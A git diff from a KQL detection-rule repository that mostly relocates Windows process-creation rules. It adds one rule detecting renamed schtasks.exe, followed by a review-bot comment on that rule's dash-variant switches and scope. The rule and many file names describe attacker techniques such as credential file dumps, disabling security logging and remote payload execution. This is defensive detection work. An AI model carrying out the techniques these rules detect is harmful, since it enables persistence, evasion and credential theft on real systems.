rename to KQL/rules/windows/process_creation/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution.kql
similarity index 100%
rename from KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution.kql
diff --git a/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_server_web_shell_execution.kql
similarity index 100%
rename from KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_screenconnect_server_web_shell_execution.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_simple_help_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_simple_help_execution.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql b/KQL/rules/windows/process_creation/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql b/KQL/rules/windows/process_creation/remote_access_tool_team_viewer_session_started_on_windows_host.kql
similarity index 100%
rename from KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_team_viewer_session_started_on_windows_host.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_ultraviewer_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_ultraviewer_execution.kql
diff --git a/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql b/KQL/rules/windows/process_creation/remote_chm_file_download_execution_via_hh_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql
rename to KQL/rules/windows/process_creation/remote_chm_file_download_execution_via_hh_exe.kql
diff --git a/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql b/KQL/rules/windows/process_creation/remote_code_execute_via_winrm_vbs.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql
rename to KQL/rules/windows/process_creation/remote_code_execute_via_winrm_vbs.kql
diff --git a/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql b/KQL/rules/windows/process_creation/remote_file_download_via_desktopimgdownldr_utility.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql
rename to KQL/rules/windows/process_creation/remote_file_download_via_desktopimgdownldr_utility.kql
diff --git a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql b/KQL/rules/windows/process_creation/remote_file_download_via_findstr_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql
rename to KQL/rules/windows/process_creation/remote_file_download_via_findstr_exe.kql
diff --git a/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql b/KQL/rules/windows/process_creation/remote_powershell_session_host_process_winrm_.kql
similarity index 100%
rename from KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql
rename to KQL/rules/windows/process_creation/remote_powershell_session_host_process_winrm_.kql
diff --git a/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql b/KQL/rules/windows/process_creation/remote_xsl_execution_via_msxsl_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql
rename to KQL/rules/windows/process_creation/remote_xsl_execution_via_msxsl_exe.kql
diff --git a/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql b/KQL/rules/windows/process_creation/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql
rename to KQL/rules/windows/process_creation/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql
diff --git a/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql b/KQL/rules/windows/process_creation/remotely_hosted_hta_file_executed_via_mshta_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql
rename to KQL/rules/windows/process_creation/remotely_hosted_hta_file_executed_via_mshta_exe.kql
diff --git a/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_autohotkey_exe_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_autohotkey_exe_execution.kql
diff --git a/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql b/KQL/rules/windows/process_creation/renamed_boinc_client_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql
rename to KQL/rules/windows/process_creation/renamed_boinc_client_execution.kql
diff --git a/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_browsercore_exe_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_browsercore_exe_execution.kql
diff --git a/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_cloudflared_exe_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_cloudflared_exe_execution.kql
diff --git a/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql b/KQL/rules/windows/process_creation/renamed_createdump_utility_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql
rename to KQL/rules/windows/process_creation/renamed_createdump_utility_execution.kql
diff --git a/KQL/rules/Execution/renamed_curl_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_curl_exe_execution.kql
similarity index 100%
rename from KQL/rules/Execution/renamed_curl_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_curl_exe_execution.kql
diff --git a/KQL/rules/Execution/renamed_ftp_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_ftp_exe_execution.kql
similarity index 100%
rename from KQL/rules/Execution/renamed_ftp_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_ftp_exe_execution.kql
diff --git a/KQL/rules/Impact/renamed_gpg_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_gpg_exe_execution.kql
similarity index 100%
rename from KQL/rules/Impact/renamed_gpg_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_gpg_exe_execution.kql
diff --git a/KQL/rules/Execution/renamed_jusched_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_jusched_exe_execution.kql
similarity index 100%
rename from KQL/rules/Execution/renamed_jusched_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_jusched_exe_execution.kql
diff --git a/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_mavinject_exe_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_mavinject_exe_execution.kql
diff --git a/KQL/rules/Defense Evasion/renamed_megasync_execution.kql b/KQL/rules/windows/process_creation/renamed_megasync_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_megasync_execution.kql
rename to KQL/rules/windows/process_creation/renamed_megasync_execution.kql
diff --git a/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql b/KQL/rules/windows/process_creation/renamed_microsoft_teams_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql
rename to KQL/rules/windows/process_creation/renamed_microsoft_teams_execution.kql
diff --git a/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_msdt_exe_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_msdt_exe_execution.kql
diff --git a/KQL/rules/Execution/renamed_nircmd_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_nircmd_exe_execution.kql
similarity index 100%
rename from KQL/rules/Execution/renamed_nircmd_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_nircmd_exe_execution.kql
diff --git a/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql b/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_office_binary_execution.kql
rename to KQL/rules/windows/process_creation/renamed_office_binary_execution.kql
diff --git a/KQL/rules/Execution/renamed_pingcastle_binary_execution.kql b/KQL/rules/windows/process_creation/renamed_pingcastle_binary_execution.kql
similarity index 100%
rename from KQL/rules/Execution/renamed_pingcastle_binary_execution.kql
rename to KQL/rules/windows/process_creation/renamed_pingcastle_binary_execution.kql
diff --git a/KQL/rules/Defense Evasion/renamed_plink_execution.kql b/KQL/rules/windows/process_creation/renamed_plink_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_plink_execution.kql
rename to KQL/rules/windows/process_creation/renamed_plink_execution.kql
diff --git a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql b/KQL/rules/windows/process_creation/renamed_procdump_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_procdump_execution.kql
rename to KQL/rules/windows/process_creation/renamed_procdump_execution.kql
diff --git a/KQL/rules/Execution/renamed_psexec_service_execution.kql b/KQL/rules/windows/process_creation/renamed_psexec_service_execution.kql
similarity index 100%
rename from KQL/rules/Execution/renamed_psexec_service_execution.kql
rename to KQL/rules/windows/process_creation/renamed_psexec_service_execution.kql
diff --git a/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql b/KQL/rules/windows/process_creation/renamed_remote_utilities_rat_rurat_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql
rename to KQL/rules/windows/process_creation/renamed_remote_utilities_rat_rurat_execution.kql
diff --git a/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql b/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql
new file mode 100644
index 00000000..60fe47ba
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_schtasks_execution.kql
@@ -0,0 +1,14 @@
+// Title: Renamed Schtasks Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-27
+// Level: high
+// Description: Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks.
+// One of the very common persistence techniques is schedule malicious tasks using schtasks.exe.
+// Since, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1036.003, attack.t1053.005
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " -tn " or ProcessCommandLine contains " /tn " or ProcessCommandLine contains " –tn " or ProcessCommandLine contains " —tn " or ProcessCommandLine contains " ―tn " or ProcessCommandLine contains " -tr " or ProcessCommandLine contains " /tr " or ProcessCommandLine contains " –tr " or ProcessCommandLine contains " —tr " or ProcessCommandLine contains " ―tr " or ProcessCommandLine contains " -sc " or ProcessCommandLine contains " /sc " or ProcessCommandLine contains " –sc " or ProcessCommandLine contains " —sc " or ProcessCommandLine contains " ―sc " or ProcessCommandLine contains " -st " or ProcessCommandLine contains " /st " or ProcessCommandLine contains " –st " or ProcessCommandLine contains " —st " or ProcessCommandLine contains " ―st " or ProcessCommandLine contains " -ru " or ProcessCommandLine contains " /ru " or ProcessCommandLine contains " –ru " or ProcessCommandLine contains " —ru " or ProcessCommandLine contains " ―ru " or ProcessCommandLine contains " -fo " or ProcessCommandLine contains " /fo " or ProcessCommandLine contains " –fo " or ProcessCommandLine contains " —fo " or ProcessCommandLine contains " ―fo ") and
(ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create " or ProcessCommandLine contains " -delete " or ProcessCommandLine contains " /delete " or ProcessCommandLine contains " –delete " or ProcessCommandLine contains " —delete " or ProcessCommandLine contains " ―delete " or ProcessCommandLine contains " -query " or ProcessCommandLine contains " /query " or ProcessCommandLine contains " –query " or ProcessCommandLine contains " —query " or ProcessCommandLine contains " ―query " or ProcessCommandLine contains " -change " or ProcessCommandLine contains " /change " or ProcessCommandLine contains " –change " or ProcessCommandLine contains " —change " or ProcessCommandLine contains " ―change " or ProcessCommandLine contains " -run " or ProcessCommandLine contains " /run " or ProcessCommandLine contains " –run " or ProcessCommandLine contains " —run " or ProcessCommandLine contains " ―run " or ProcessCommandLine contains " -end " or ProcessCommandLine contains " /end " or ProcessCommandLine contains " –end " or ProcessCommandLine contains " —end " or ProcessCommandLine contains " ―end ")) and (not(ProcessCommandLine contains "schtasks"))) or (ProcessVersionInfoOriginalFileName =~ "schtasks.exe" and (not(FolderPath endswith "\\schtasks.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql b/KQL/rules/windows/process_creation/renamed_sysinternals_debugview_execution.kql
similarity index 100%
rename from KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql
rename to KQL/rules/windows/process_creation/renamed_sysinternals_debugview_execution.kql
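Review bot: The en-dash, em-dash and horizontal-bar switch variants in the where clause (` –tn `, ` —tn `, ` ―tn ` and the same for every other switch) read like stray characters and are likely to be "cleaned up" by a later editor; the header should state they are deliberate, e.g. `// Note: the en-dash/em-dash/horizontal-bar switch spellings are intentional (Sigma windash expansion); several Windows command-line tools accept them as switch prefixes.` The second branch excludes any image whose FolderPath ends with \schtasks.exe regardless of directory, which matches the "renamed" scope of the title but means a copy that keeps its original name in another folder is out of scope — one sentence in the description would save readers from assuming otherwise. The first branch's `not(ProcessCommandLine contains "schtasks")` is case-insensitive, so the comment does not need to spell out case handling, but it is worth noting that this branch fires on the parameter pattern alone and the "Unlikely" False Positives entry rests on no other tool sharing those switch pairs.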
diff --git a/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql b/KQL/rules/windows/process_creation/renamed_sysinternals_sdelete_execution.kql
similarity index 100%
rename from KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql
rename to KQL/rules/windows/process_creation/renamed_sysinternals_sdelete_execution.kql
diff --git a/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql b/KQL/rules/windows/process_creation/renamed_visual_studio_code_tunnel_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql
rename to KQL/rules/windows/process_creation/renamed_visual_studio_code_tunnel_execution.kql
diff --git a/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_vmnat_exe_execution.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql
rename to KQL/rules/windows/process_creation/renamed_vmnat_exe_execution.kql
diff --git a/KQL/rules/Discovery/renamed_whoami_execution.kql b/KQL/rules/windows/process_creation/renamed_whoami_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/renamed_whoami_execution.kql
rename to KQL/rules/windows/process_creation/renamed_whoami_execution.kql
diff --git a/KQL/rules/Command and Control/replace_exe_usage.kql b/KQL/rules/windows/process_creation/replace_exe_usage.kql
similarity index 100%
rename from KQL/rules/Command and Control/replace_exe_usage.kql
rename to KQL/rules/windows/process_creation/replace_exe_usage.kql
diff --git a/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/response_file_execution_via_odbcconf_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql
rename to KQL/rules/windows/process_creation/response_file_execution_via_odbcconf_exe.kql
diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql b/KQL/rules/windows/process_creation/restrictedadminmode_registry_value_tampering_proccreation.kql
similarity index 100%
rename from KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql
rename to KQL/rules/windows/process_creation/restrictedadminmode_registry_value_tampering_proccreation.kql
diff --git a/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql b/KQL/rules/windows/process_creation/root_certificate_installed_from_susp_locations.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql
rename to KQL/rules/windows/process_creation/root_certificate_installed_from_susp_locations.kql
diff --git a/KQL/rules/Execution/ruby_inline_command_execution.kql b/KQL/rules/windows/process_creation/ruby_inline_command_execution.kql
similarity index 100%
rename from KQL/rules/Execution/ruby_inline_command_execution.kql
rename to KQL/rules/windows/process_creation/ruby_inline_command_execution.kql
diff --git a/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql b/KQL/rules/windows/process_creation/run_once_task_execution_as_configured_in_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql
rename to KQL/rules/windows/process_creation/run_once_task_execution_as_configured_in_registry.kql
diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql b/KQL/rules/windows/process_creation/run_powershell_script_from_ads.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql
rename to KQL/rules/windows/process_creation/run_powershell_script_from_ads.kql
diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql b/KQL/rules/windows/process_creation/run_powershell_script_from_redirected_input_stream.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql
rename to KQL/rules/windows/process_creation/run_powershell_script_from_redirected_input_stream.kql
diff --git a/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql b/KQL/rules/windows/process_creation/rundll32_execution_with_uncommon_dll_extension.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql
rename to KQL/rules/windows/process_creation/rundll32_execution_with_uncommon_dll_extension.kql
diff --git a/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql b/KQL/rules/windows/process_creation/rundll32_execution_without_commandline_parameters.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql
rename to KQL/rules/windows/process_creation/rundll32_execution_without_commandline_parameters.kql
diff --git a/KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql b/KQL/rules/windows/process_creation/rundll32_execution_without_parameters.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql
rename to KQL/rules/windows/process_creation/rundll32_execution_without_parameters.kql
diff --git a/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql b/KQL/rules/windows/process_creation/rundll32_installscreensaver_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql
rename to KQL/rules/windows/process_creation/rundll32_installscreensaver_execution.kql
diff --git a/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql b/KQL/rules/windows/process_creation/rundll32_registered_com_objects.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql
rename to KQL/rules/windows/process_creation/rundll32_registered_com_objects.kql
diff --git a/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql b/KQL/rules/windows/process_creation/rundll32_spawned_via_explorer_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql
rename to KQL/rules/windows/process_creation/rundll32_spawned_via_explorer_exe.kql
diff --git a/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql b/KQL/rules/windows/process_creation/rundll32_spawning_explorer.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql
rename to KQL/rules/windows/process_creation/rundll32_spawning_explorer.kql
diff --git a/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql b/KQL/rules/windows/process_creation/rundll32_unc_path_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql
rename to KQL/rules/windows/process_creation/rundll32_unc_path_execution.kql
diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql b/KQL/rules/windows/process_creation/runmru_registry_key_deletion.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql
rename to KQL/rules/windows/process_creation/runmru_registry_key_deletion.kql
diff --git a/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql b/KQL/rules/windows/process_creation/safeboot_registry_key_deleted_via_reg_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql
rename to KQL/rules/windows/process_creation/safeboot_registry_key_deleted_via_reg_exe.kql
diff --git a/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql b/KQL/rules/windows/process_creation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
rename to KQL/rules/windows/process_creation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_masquerading_as_system_processes.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql
rename to KQL/rules/windows/process_creation/scheduled_task_creation_masquerading_as_system_processes.kql
diff --git a/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_via_schtasks_exe.kql
similarity index 100%
rename from KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql
rename to KQL/rules/windows/process_creation/scheduled_task_creation_via_schtasks_exe.kql
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
rename to KQL/rules/windows/process_creation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql b/KQL/rules/windows/process_creation/scheduled_task_executing_encoded_payload_from_registry.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql
rename to KQL/rules/windows/process_creation/scheduled_task_executing_encoded_payload_from_registry.kql
diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql b/KQL/rules/windows/process_creation/scheduled_task_executing_payload_from_registry.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql
rename to KQL/rules/windows/process_creation/scheduled_task_executing_payload_from_registry.kql
diff --git a/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql b/KQL/rules/windows/process_creation/schtasks_creation_or_modification_with_system_privileges.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql
rename to KQL/rules/windows/process_creation/schtasks_creation_or_modification_with_system_privileges.kql
diff --git a/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql b/KQL/rules/windows/process_creation/schtasks_from_suspicious_folders.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql
rename to KQL/rules/windows/process_creation/schtasks_from_suspicious_folders.kql
diff --git a/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql b/KQL/rules/windows/process_creation/screen_capture_activity_via_psr_exe.kql
similarity index 100%
rename from KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql
rename to KQL/rules/windows/process_creation/screen_capture_activity_via_psr_exe.kql
diff --git a/KQL/rules/Execution/script_event_consumer_spawning_process.kql b/KQL/rules/windows/process_creation/script_event_consumer_spawning_process.kql similarity index 100% rename from KQL/rules/Execution/script_event_consumer_spawning_process.kql rename to KQL/rules/windows/process_creation/script_event_consumer_spawning_process.kql diff --git a/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql b/KQL/rules/windows/process_creation/script_interpreter_execution_from_suspicious_folder.kql similarity index 100% rename from KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql rename to KQL/rules/windows/process_creation/script_interpreter_execution_from_suspicious_folder.kql diff --git a/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql b/KQL/rules/windows/process_creation/scripting_commandline_process_spawned_regsvr32.kql similarity index 100% rename from KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql rename to KQL/rules/windows/process_creation/scripting_commandline_process_spawned_regsvr32.kql diff --git a/KQL/rules/Defense Evasion/sdclt_child_processes.kql b/KQL/rules/windows/process_creation/sdclt_child_processes.kql similarity index 100% rename from KQL/rules/Defense Evasion/sdclt_child_processes.kql rename to KQL/rules/windows/process_creation/sdclt_child_processes.kql diff --git a/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql b/KQL/rules/windows/process_creation/sdiagnhost_calling_suspicious_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql rename to KQL/rules/windows/process_creation/sdiagnhost_calling_suspicious_child_process.kql 
diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql b/KQL/rules/windows/process_creation/security_event_logging_disabled_via_minint_registry_key_process.kql similarity index 100% rename from KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql rename to KQL/rules/windows/process_creation/security_event_logging_disabled_via_minint_registry_key_process.kql diff --git a/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql b/KQL/rules/windows/process_creation/security_privileges_enumeration_via_whoami_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql rename to KQL/rules/windows/process_creation/security_privileges_enumeration_via_whoami_exe.kql diff --git a/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/security_service_disabled_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql rename to KQL/rules/windows/process_creation/security_service_disabled_via_reg_exe.kql diff --git a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql b/KQL/rules/windows/process_creation/security_tools_keyword_lookup_via_findstr_exe.kql similarity index 100% rename from KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql rename to KQL/rules/windows/process_creation/security_tools_keyword_lookup_via_findstr_exe.kql 
diff --git a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql b/KQL/rules/windows/process_creation/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql rename to KQL/rules/windows/process_creation/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql diff --git a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql b/KQL/rules/windows/process_creation/sensitive_file_access_via_volume_shadow_copy_backup.kql similarity index 100% rename from KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql rename to KQL/rules/windows/process_creation/sensitive_file_access_via_volume_shadow_copy_backup.kql diff --git a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/sensitive_file_dump_via_wbadmin_exe.kql similarity index 100% rename from KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql rename to KQL/rules/windows/process_creation/sensitive_file_dump_via_wbadmin_exe.kql diff --git a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql similarity index 100% rename from KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql rename to KQL/rules/windows/process_creation/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql 
